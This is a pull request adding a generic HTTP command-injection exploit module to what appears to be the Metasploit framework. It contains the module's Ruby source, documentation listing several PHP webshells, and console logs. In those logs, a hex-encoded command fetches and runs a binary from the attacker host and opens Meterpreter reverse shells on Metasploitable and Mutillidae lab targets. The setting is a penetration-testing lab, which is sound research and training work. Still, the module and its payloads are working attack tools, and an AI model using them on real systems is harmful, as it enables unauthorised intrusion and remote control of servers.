### PR TITLE
Add: exploits/multi/http/os_cmd_exec

### DIFF
--- a/documentation/modules/exploit/multi/http/os_cmd_exec.md
+++ b/documentation/modules/exploit/multi/http/os_cmd_exec.md
@@ -1,0 +1,266 @@
+## Vulnerable Application
+
+This module is for any generic HTTP command execution where user-supplied input is directly passed to system execution functions via a HTTP request.
+As a result, able to use:
+- Any web command execution vulnerability _(think hardware devices having ping/traceroute functions)_
+- Any lab target, which have a "command execution" module.
+  - Such as [DVWA](https://github.com/digininja/DVWA) or [Mutillidae](https://github.com/webpwnized/mutillidae)
+  - Included with [Metasploitable](https://docs.rapid7.com/metasploit/metasploitable-2/)
+- Alternatively, simulate with one of the following PHP code snippets (for a basic webshell):
+  - `<?php system($_REQUEST["cmd"]); ?>`
+  - `<?php passthru($_REQUEST["cmd"]); ?>`
+  - `<?php echo exec($_REQUEST["cmd"]); ?>`
+  - `<?php echo shell_exec($_REQUEST["cmd"]); ?>`
+  - `<?php echo fread(popen($_REQUEST["cmd"], "r"), 2096); ?>`
+  - ```<?php echo `{$_REQUEST["cmd"]}`; ?>```
+
+This is similar to `exploits/unix/webapp/php_eval`, except it isn't limited to PHP’s code execution, but can use any OS command execution function.
+
+- - -
+
+Setting up a quick PHP test lab on a Debian-base host:
+
+```console
+$ sudo apt-get install --yes apache2 php curl
+[...]
+$
+$ sudo systemctl start apache2
+$
+$ echo '<?php system($_REQUEST["cmd"]); ?>' | sudo tee /var/www/html/shell.php
+<?php system($_REQUEST["cmd"]); ?>
+$
+$ curl localhost/shell.php?cmd=id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+$
+```
+
+## Verification Steps
+
+1. Setup lab, or find a web command execution vulnerability
+1. Start `msfconsole`
+1. Do: `use exploits/multi/http/os_cmd_exec`
+1. Do: Set `RHOSTS` and `URIPATH` (`HEADERS` and `POSTDATA` are optional, depending on vulnerability). May also want to customize the payload and `LHOST` if desired
+1. Do: `run`
+1. You should get a shell
+
+## Options
+
+### `HEADERS`
+
+Any additional HTTP headers to send, cookies for example. Format: `header:value,header2:value2`.
+
+### `POSTDATA`
+
+Any HTTP POST method request data to send, with the command injection placeholder set to `!INJECT!`.
+If this value is blank, will be a HTTP GET method request.
+
+### `Proxies`
+
+A proxy chain of format: `type:host:port[,type:host:port][...]`.
+Supported proxies: `sapni`, `socks4`, `socks5`, `socks5h`, `http`
+
+### `RHOSTS`
+
+The target host(s), see: https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+
+### `RPORT`
+
+The target port (TCP).
+Default: `80`
+
+### `SSL`
+
+Negotiate SSL/TLS for outgoing connections.
+Default: `false`
+
+### `URIPATH`
+
+The URI to request, with the command injection placeholder set to `!INJECT!`.
+Default: `/ping/?cmd=!INJECT!`
+
+### `VHOST`
+
+HTTP server virtual host.
+
+## Scenarios
+
+### Example PHP Lab
+
+```console
+msfadmin@metasploitable:~$ echo '<?php system($_REQUEST["cmd"]); ?>' | sudo tee /var/www/shell.php
+<?php system($_REQUEST["cmd"]); ?>
+msfadmin@metasploitable:~$ curl localhost/shell.php?cmd=id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+msfadmin@metasploitable:~$
+
+
+
+msf exploit(multi/http/os_cmd_exec) > options
+
+Module options (exploit/multi/http/os_cmd_exec):
+
+   Name      Current Setting          Required  Description
+   ----      ---------------          --------  -----------
+   HEADERS                            no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
+   POSTDATA                           no        POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sapni, socks4
+   RHOSTS    10.0.0.10                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     80                       yes       The target port (TCP)
+   SSL       false                    no        Negotiate SSL/TLS for outgoing connections
+   URIPATH   /shell.php?cmd=!INJECT!  yes       The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
+   VHOST                              no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
+                                              zsh) (Accepted: none, python3.8+, shell-search, shell)
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST           tap0             yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_COMMAND is one of CURL,GET,WGET:
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.
+
+
+   When FETCH_FILELESS is none:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      mANdNVqs         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(multi/http/os_cmd_exec) > check
+[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=echo%20lKPACzWGh0CD9fjQh2HJAPzO
+[+] 10.0.0.10:80 - The target is vulnerable.
+msf exploit(multi/http/os_cmd_exec) > run
+[*] Started reverse TCP handler on 10.0.0.1:4444
+[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=/bin/echo%20-ne%20%27\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x3b\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x26%27%7csh
+[*] Sending stage (1062760 bytes) to 10.0.0.10
+[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:46267) at 2026-03-14 20:35:06 +0000
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : metasploitable.localdomain
+OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
+Architecture : i686
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter >
+```
+
+### Mutillidae
+
+This is on Metasploitable 2 VM:
+
+```console
+msf > use exploits/multi/http/os_cmd_exec
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/http/os_cmd_exec) > set PAYLOAD cmd/linux/http/x86/meterpreter/reverse_tcp
+PAYLOAD => cmd/linux/http/x86/meterpreter/reverse_tcp
+msf exploit(multi/http/os_cmd_exec) > set RHOSTS 10.0.0.10
+RHOSTS => 10.0.0.10
+msf exploit(multi/http/os_cmd_exec) > set LHOST tap0
+LHOST => tap0
+msf exploit(multi/http/os_cmd_exec) > set URIPATH /mutillidae/index.php?page=dns-lookup.php
+URIPATH => /mutillidae/index.php?page=dns-lookup.php
+msf exploit(multi/http/os_cmd_exec) > set POSTDATA "target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS"
+POSTDATA => target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS
+msf exploit(multi/http/os_cmd_exec) >
+msf exploit(multi/http/os_cmd_exec) > options
+
+Module options (exploit/multi/http/os_cmd_exec):
+
+   Name      Current Setting                                                Required  Description
+   ----      ---------------                                                --------  -----------
+   HEADERS                                                                  no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
+   POSTDATA  target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS  no        POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
+   Proxies                                                                  no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
+   RHOSTS    10.0.0.10                                                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     80                                                             yes       The target port (TCP)
+   SSL       false                                                          no        Negotiate SSL/TLS for outgoing connections
+   URIPATH   /mutillidae/index.php?page=dns-lookup.php                      yes       The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
+   VHOST                                                                    no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
+                                              zsh) (Accepted: none, python3.8+, shell-search, shell)
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST           tap0             yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_COMMAND is one of CURL,GET,WGET:
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.
+
+
+   When FETCH_FILELESS is none:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      SYonhqJf         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(multi/http/os_cmd_exec) > check
+[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;echo%203uCamYlgMAEsiPoIGU6cWjjQIgzI&dns-lookup-php-submit-button=Lookup+DNS
+[+] 10.0.0.10:80 - The target is vulnerable.
+msf exploit(multi/http/os_cmd_exec) > run
+[*] Started reverse TCP handler on 10.0.0.1:4444
+[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x3b\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x26'|sh&dns-lookup-php-submit-button=Lookup+DNS
+[*] Sending stage (1062760 bytes) to 10.0.0.10
+[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:45260) at 2026-03-14 07:32:49 +0000
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : metasploitable.localdomain
+OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
+Architecture : i686
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter >
+```

--- a/modules/exploits/multi/http/os_cmd_exec.rb
+++ b/modules/exploits/multi/http/os_cmd_exec.rb
@@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     method = datastore['POSTDATA'] ? 'POST' : 'GET'
-    content = rand_text_alphanumeric(16 + rand(16))
+    content = rand_text_alphanumeric(rand(16..31))
     payload = Rex::Text.uri_encode("echo #{content}")
     uri = datastore['URIPATH'].sub('!INJECT!', payload)
     data = method.casecmp?('get') ? nil : datastore['POSTDATA'].sub('!INJECT!', payload)

--- a/modules/exploits/multi/http/os_cmd_exec.rb
+++ b/modules/exploits/multi/http/os_cmd_exec.rb
@@ -84,8 +84,16 @@ class MetasploitModule < Msf::Exploit::Remote
     headers_hash = {}
     if headers && !headers.empty?
       headers.split(',').each do |header|
-        key, value = header.split(':')
-        headers_hash[key] = value.strip
+        next if header.nil? || header.empty?
+
+        key, value = header.split(':', 2)
+        next if key.nil? || value.nil?
+
+        key = key.strip
+        value = value.strip
+        next if key.empty? || value.empty?
+
+        headers_hash[key] = value
       end
     end
     headers_hash

--- a/modules/exploits/multi/http/os_cmd_exec.rb
+++ b/modules/exploits/multi/http/os_cmd_exec.rb
@@ -1,0 +1,143 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Generic HTTP Command Execution',
+        'Description' => %q{
+          This module interacts with existing command execution functionality on a target system,
+          where user-supplied input is directly passed to system execution functions via a HTTP request.
+          This could be from an existing vulnerability, or uploaded webshells such as:
+          <?php passthru($_REQUEST['cmd']); ?>
+          <?php system($_REQUEST['cmd']); ?>
+          <?php echo exec($_REQUEST['cmd']); ?>
+          <?php echo shell_exec($_REQUEST['cmd']); ?>
+          <?php echo fread(popen($_REQUEST['cmd'], 'r'), 2096); ?>
+          <?php echo `{$_REQUEST['cmd']}`; ?>
+
+          It is likely that HTTP evasion options will break this exploit.
+        },
+        'Privileged' => false,
+        'Payload' => {
+          'DisableNops' => true,
+          'BadChars' => '&;' # `&` = GET   `;` = POST
+        },
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          [
+            'Linux', {
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'Unix', {
+              'Platform' => 'unix'
+            }
+          ],
+          [
+            'Windows', {
+              'Platform' => 'win'
+            }
+          ],
+          [
+            'macOS/OSX', {
+              'Platform' => 'osx'
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Author' => [
+          'egypt',   # Original Metasploit module: exploits/unix/webapp/php_eval
+          'g0tmi1k'  # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2026-02-26',
+        'References' => [],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('POSTDATA', [false, 'POST data to send, with the command injection placeholder set to !INJECT!. Otherwise, a GET request will be used.']),
+        OptString.new('URIPATH', [true, 'The URI to request, with the command injection placeholder set to !INJECT!.', '/ping/?cmd=!INJECT!']),
+        OptString.new('HEADERS', [false, 'Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"'])
+      ]
+    )
+  end
+
+  def datastore_headers
+    headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ''
+    headers_hash = {}
+    if headers && !headers.empty?
+      headers.split(',').each do |header|
+        key, value = header.split(':')
+        headers_hash[key] = value.strip
+      end
+    end
+    headers_hash
+  end
+
+  def send_request(method, uri, data, timeout = 30)
+    feedback_text = "Sending #{method} request: http#{ssl ? 's' : ''}://#{rhost}:#{rport}#{uri}"
+    feedback_text << " -> #{data}" unless method.casecmp?('get')
+    print_status(feedback_text)
+
+    req = {
+      'global' => true,
+      'uri' => uri,
+      'method' => method,
+      'headers' => datastore_headers.merge(
+        'Connection' => 'close'
+      )
+    }
+    unless method.casecmp?('get')
+      req['headers']['Content-Type'] = 'application/x-www-form-urlencoded'
+      req['data'] = data
+    end
+
+    send_request_raw(req, timeout)
+  end
+
+  def check
+    method = datastore['POSTDATA'] ? 'POST' : 'GET'
+    content = rand_text_alphanumeric(16 + rand(16))
+    payload = Rex::Text.uri_encode("echo #{content}")
+    uri = datastore['URIPATH'].sub('!INJECT!', payload)
+    data = method.casecmp?('get') ? nil : datastore['POSTDATA'].sub('!INJECT!', payload)
+
+    response = send_request(method, uri, data)
+
+    return Exploit::CheckCode::Unknown unless response
+    return Exploit::CheckCode::Appears if response.code == 200 && response.body.match(content)
+    return Exploit::CheckCode::Detected if response.code == 200
+
+    vprint_error("Server responded with: HTTP #{response.code}")
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    method = datastore['POSTDATA'] ? 'POST' : 'GET'
+    uri = datastore['URIPATH'].sub('!INJECT!', Rex::Text.uri_encode(payload.encoded))
+    data = method.casecmp?('get') ? nil : datastore['POSTDATA'].sub('!INJECT!', payload.encoded)
+
+    # Very short timeout because the request may never return if we're sending a socket payload
+    timeout = 0.01
+
+    response = send_request(method, uri, data, timeout)
+    vprint_warning("Server responded with: HTTP #{response.code}") if response && response.code != 200
+  end
+end

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -31,12 +31,12 @@ class MetasploitModule < Msf::Exploit::Remote
           # http://www.boutell.com/newfaq/misc/urllength.html
           # 'Space'       => 4000,
           'DisableNops' => true,
-          'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
+          'BadChars' => %q{'"`}, # quotes are escaped by PHP's magic_quotes_gpc in a default install
           'Compat' =>
                         {
-                          'ConnectionType' => 'find',
+                          'ConnectionType' => 'find'
                         },
-          'Keys' => ['php'],
+          'Keys' => ['php']
         },
         'DisclosureDate' => '2008-10-13',
         'Targets' => [ ['Automatic', {}], ],
@@ -52,13 +52,13 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('URIPATH', [ true, "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),
-        OptString.new('HEADERS', [false, "Any additional HTTP headers to send, cookies for example. Format: \"header:value,header2:value2\""])
+        OptString.new('HEADERS', [false, 'Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"'])
       ]
     )
   end
 
   def check
-    uri = datastore['PHPURI'].gsub(/\?.*/, "")
+    uri = datastore['PHPURI'].gsub(/\?.*/, '')
     print_status("Checking uri #{uri}")
     response = send_request_raw({ 'uri' => uri })
     if response.code == 200
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def datastore_headers
-    headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
+    headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ''
     headers_hash = {}
     if headers && !headers.empty?
       headers.split(',').each do |header|
@@ -94,11 +94,11 @@ class MetasploitModule < Msf::Exploit::Remote
     # sending a socket payload
     timeout = 0.01
 
-    headername = "X-" + Rex::Text.rand_text_alpha_upper(rand(10) + 10)
-    stub = "error_reporting(0);eval($_SERVER[HTTP_#{headername.gsub("-", "_")}]);"
+    headername = 'X-' + Rex::Text.rand_text_alpha_upper(rand(10..19))
+    stub = "error_reporting(0);eval($_SERVER[HTTP_#{headername.gsub('-', '_')}]);"
 
-    uri = datastore['URIPATH'].sub("!CODE!", Rex::Text.uri_encode(stub))
-    print_status("Sending request for: http#{ssl ? "s" : ""}://#{rhost}:#{rport}#{uri}")
+    uri = datastore['URIPATH'].sub('!CODE!', Rex::Text.uri_encode(stub))
+    print_status("Sending request for: http#{ssl ? 's' : ''}://#{rhost}:#{rport}#{uri}")
     print_status("Payload will be in a header called #{headername}")
 
     response = send_request_raw({
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Connection' => 'close'
       )
     }, timeout)
-    if response and response.code != 200
+    if response && (response.code != 200)
       print_error("Server returned non-200 status code (#{response.code})")
     end
 

--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -74,8 +74,16 @@ class MetasploitModule < Msf::Exploit::Remote
     headers_hash = {}
     if headers && !headers.empty?
       headers.split(',').each do |header|
-        key, value = header.split(':')
-        headers_hash[key] = value.strip
+        next if header.nil? || header.empty?
+
+        key, value = header.split(':', 2)
+        next if key.nil? || value.nil?
+
+        key = key.strip
+        value = value.strip
+        next if key.empty? || value.empty?
+
+        headers_hash[key] = value
       end
     end
     headers_hash

--- a/modules/exploits/unix/webapp/php_include.rb
+++ b/modules/exploits/unix/webapp/php_include.rb
@@ -14,34 +14,34 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name'	=> 'PHP Remote File Include Generic Code Execution',
-        'Description'	=> %q{
+        'Name' => 'PHP Remote File Include Generic Code Execution',
+        'Description' => %q{
           This module can be used to exploit any generic PHP file include vulnerability,
           where the application includes code like the following:
 
           <?php include($_GET['path']); ?>
         },
-        'Author'	=> [ 'hdm', 'egypt', 'ethicalhack3r' ],
-        'License'	=> MSF_LICENSE,
-        # 'References'	=> [ ],
-        'Privileged'	=> false,
+        'Author' => [ 'hdm', 'egypt', 'ethicalhack3r' ],
+        'License' => MSF_LICENSE,
+        # 'References' => [ ],
+        'Privileged' => false,
         'Payload' => {
           'DisableNops' => true,
-          'Compat'	=>
+          'Compat' =>
                         {
-                          'ConnectionType' => 'find',
+                          'ConnectionType' => 'find'
                         },
           # Arbitrary big number. The payload gets sent as an HTTP
           # response body, so really it's unlimited
-          'Space'	=> 262144, # 256k
+          'Space' => 262144 # 256k
         },
         'DefaultOptions' => {
           'WfsDelay' => 30
         },
         'DisclosureDate' => '2006-12-17',
-        'Platform'	=> 'php',
-        'Arch'	=> ARCH_PHP,
-        'Targets'	=> [[ 'Automatic', {}]],
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [[ 'Automatic', {}]],
         'DefaultTarget' => 0,
         'Notes' => {
           'Reliability' => UNKNOWN_RELIABILITY,
@@ -52,27 +52,27 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('PATH', [ true, "The base directory to prepend to the URL to try", '/']),
-      OptString.new('PHPURI', [false, "The URI to request, with the include parameter changed to XXpathXX"]),
-      OptString.new('POSTDATA', [false, "The POST data to send, with the include parameter changed to XXpathXX"]),
-      OptString.new('HEADERS', [false, "Any additional HTTP headers to send, cookies for example. Format: \"header:value,header2:value2\""]),
+      OptString.new('PATH', [ true, 'The base directory to prepend to the URL to try', '/']),
+      OptString.new('PHPURI', [false, 'The URI to request, with the include parameter changed to XXpathXX']),
+      OptString.new('POSTDATA', [false, 'The POST data to send, with the include parameter changed to XXpathXX']),
+      OptString.new('HEADERS', [false, 'Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"']),
       OptPath.new('PHPRFIDB', [
-        false, "A local file containing a list of URLs to try, with XXpathXX replacing the URL",
-        File.join(Msf::Config.data_directory, "exploits", "php", "rfi-locations.dat")
+        false, 'A local file containing a list of URLs to try, with XXpathXX replacing the URL',
+        File.join(Msf::Config.data_directory, 'exploits', 'php', 'rfi-locations.dat')
       ])
     ])
   end
 
   def check
-    uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : ""
+    uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : ''
 
     tpath = normalize_uri(datastore['PATH'])
     if tpath[-1, 1] == '/'
       tpath = tpath.chop
     end
 
-    if (uri and !uri.empty?)
-      uri.gsub!(/\?.*/, "")
+    if (uri && !uri.empty?)
+      uri.gsub!(/\?.*/, '')
       print_status("Checking uri #{rhost + tpath + uri}")
       response = send_request_raw({ 'uri' => tpath + uri })
       return Exploit::CheckCode::Detected if response.code == 200
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def datastore_headers
-    headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
+    headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ''
     headers_hash = {}
     if headers && !headers.empty?
       headers.split(',').each do |header|
@@ -113,30 +113,30 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # PHPURI overrides the PHPRFIDB list
-    if (datastore['PHPURI'] and not datastore['PHPURI'].empty? and (datastore['POSTDATA'].nil? or datastore['POSTDATA'].empty?))
-      uris << datastore['PHPURI'].strip.gsub('XXpathXX', Rex::Text.to_hex(php_include_url, "%"))
-      http_method = "GET"
-    elsif (datastore['POSTDATA'] and not datastore['POSTDATA'].empty?)
+    if (datastore['PHPURI'] && (!datastore['PHPURI'].empty?) && (datastore['POSTDATA'].nil? || datastore['POSTDATA'].empty?))
+      uris << datastore['PHPURI'].strip.gsub('XXpathXX', Rex::Text.to_hex(php_include_url, '%'))
+      http_method = 'GET'
+    elsif (datastore['POSTDATA'] && (!datastore['POSTDATA'].empty?))
       uris << datastore['PHPURI']
-      postdata = datastore['POSTDATA'].strip.gsub('XXpathXX', Rex::Text.to_hex(php_include_url, "%"))
-      http_method = "POST"
+      postdata = datastore['POSTDATA'].strip.gsub('XXpathXX', Rex::Text.to_hex(php_include_url, '%'))
+      http_method = 'POST'
     else
-      print_status("Loading RFI URLs from the database...")
-      ::File.open(datastore['PHPRFIDB'], "rb") do |fd|
+      print_status('Loading RFI URLs from the database...')
+      ::File.open(datastore['PHPRFIDB'], 'rb') do |fd|
         fd.read(fd.stat.size).split(/\n/).each do |line|
           line.strip!
           next if line.empty?
           next if line =~ /^#/
-          next if line !~ /^\//
+          next if line !~ %r{^/}
 
           uris << line.gsub(
-            'XXpathXX', Rex::Text.to_hex(php_include_url.sub(/\?$/, '') + '?', "%") # ? append is required
+            'XXpathXX', Rex::Text.to_hex(php_include_url.sub(/\?$/, '') + '?', '%') # ? append is required
           )
         end
       end
       uris.uniq!
       print_status("Loaded #{uris.length} URLs")
-      http_method = "GET"
+      http_method = 'GET'
     end
 
     # Very short timeout because the request may never return if we're
@@ -150,21 +150,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
       vprint_status("Sending: #{rhost + tpath + uri}")
       begin
-        if http_method == "GET"
-          response = send_request_raw({
+        if http_method == 'GET'
+          send_request_raw({
             'global' => true,
-            'uri'	=> tpath + uri,
-            'headers' => datastore_headers,
+            'uri' => tpath + uri,
+            'headers' => datastore_headers
           }, timeout)
-        elsif http_method == "POST"
-          response = send_request_raw(
+        elsif http_method == 'POST'
+          send_request_raw(
             {
-              'global'	=> true,
-              'uri'	=> tpath + uri,
-              'method'	=> http_method,
-              'data'	=> postdata,
+              'global' => true,
+              'uri' => tpath + uri,
+              'method' => http_method,
+              'data' => postdata,
               'headers' => datastore_headers.merge({
-                'Content-Type'	=> 'application/x-www-form-urlencoded',
+                'Content-Type' => 'application/x-www-form-urlencoded',
                 'Content-Length' => postdata.length
               })
             }, timeout
@@ -174,10 +174,10 @@ class MetasploitModule < Msf::Exploit::Remote
       rescue ::Interrupt
         raise $!
       rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused
-        print_error("The target service unreachable")
+        print_error('The target service unreachable')
         break
       rescue ::OpenSSL::SSL::SSLError
-        print_error("The target failed to negotiate SSL, is this really an SSL service?")
+        print_error('The target failed to negotiate SSL, is this really an SSL service?')
         break
       rescue ::Exception => e
         print_error("Exception #{e.class} #{e}")

--- a/modules/exploits/unix/webapp/php_include.rb
+++ b/modules/exploits/unix/webapp/php_include.rb
@@ -86,11 +86,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def datastore_headers
     headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
-    headers_hash = Hash.new
-    if (headers and !headers.empty?)
+    headers_hash = {}
+    if headers && !headers.empty?
       headers.split(',').each do |header|
-        key, value = header.split(':')
-        headers_hash[key] = value.strip
+        next if header.nil? || header.empty?
+
+        key, value = header.split(':', 2)
+        next if key.nil? || value.nil?
+
+        key = key.strip
+        value = value.strip
+        next if key.empty? || value.empty?
+
+        headers_hash[key] = value
       end
     end
     headers_hash


### PR DESCRIPTION
Idea came from DVWA/Mutillidae in Metasploitable 2, which have "Command Execution" modules:

- DVWA: http://10.0.0.10/dvwa/vulnerabilities/exec/ _(Creds: `admin`/`password`)_
- Mutillidae: http://10.0.0.10/mutillidae/index.php?page=dns-lookup.php _(Creds: N/A)_

This is a bit like `exploit/multi/script/web_delivery`, however, it makes the HTTP request to trigger a session/shell, so all can be done inside of metasploit (and without calling curl/wget!).

Looking at what's already in MSF:

- exploit/unix/webapp/php_eval    <-- Exploit PHP function, eval()
- exploit/unix/webapp/php_include <-- RFI 

There isn't anything that could do PHP's `system()`, `passthru()` etc.
Doesn't have to be limited to PHP too, as there is the infamous "ping" or "traceroute" pages/functions in routers/hardware that could be vulnerable to command injection.

_A lot of this was based on: `exploits/unix/webapp/php_eval`._

- - - 

## Demo (Mutillidae)

```console
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use exploits/multi/http/os_cmd_exec; set URIPATH /mutillidae/index.php?page=dns-lookup.php; set POSTDATA "target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS";'
VERBOSE => true
RHOSTS => 10.0.0.10
